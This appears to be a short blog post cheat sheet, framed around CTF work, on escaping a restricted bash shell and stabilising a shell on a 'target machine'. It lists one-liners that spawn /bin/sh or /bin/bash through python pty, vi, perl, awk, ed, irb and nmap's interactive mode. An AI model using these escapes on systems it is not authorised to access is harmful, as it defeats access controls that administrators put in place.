O’cmon, rbash is hated one too!

Breaking out of a Restricted shell

Why do I even care? You have to!!

My end goal is spawning a bourne shell.What are the initial steps?

  • Grab a valid tty of your default OS (tty: it’s a teletypewriter for terminal)
  • Your running OS? Take hold of those binaries. But how? by exporting each environment variables
  • You like color coded terminal which showcase easily the Files, Directories, file permissions?
  • Making our shell stable.

python -c ‘import pty; pty.spawn(“/bin/bash”)’
OR
python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
export TERM=xterm-256color
Ctrl + Z (Background Process.)
stty raw -echo ; fg ; reset
stty columns 200 rows 200

— — — — — — — — — — — — — — →

rbash(Restricted Bash shell?)

There are various methods. Personally, I like vi because it’s always win-win as this is always available.
$ vi
:set shell=/bin/sh
:shell

$ vim
:set shell=/bin/sh
:shell

Is there python on target machine?
python -c ‘import pty; pty.spawn(“/bin/bash”)’
python -c ‘import pty; pty.spawn(“/bin/sh”)’

Is there perl on the target machine?
perl -e ‘exec “/bin/bash”;’
perl -e ‘exec “/bin/sh”;’

Is there AWK on the target machine?
awk ‘BEGIN {system(“/bin/bash -i”)}’
awk ‘BEGIN {system(“/bin/sh -i”)}’

Is there ed on the target machines?
ed
!sh

IRB Present on the target machine?
exec “/bin/sh”

Is there Nmap on the target machine?
nmap — interactive
nmap> !sh

— — — — — — — — — — — — — — — — — -

I hope that might have helped you something.

I’m Neelesh, I’ll see you on the internet!

Linkedin: https://www.linkedin.com/in/user-neeleshpatel/

Twitter:https://twitter.com/neelesh________

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Neelesh Patel

Neelesh Patel

Cybersecurity | CTFs | Networking |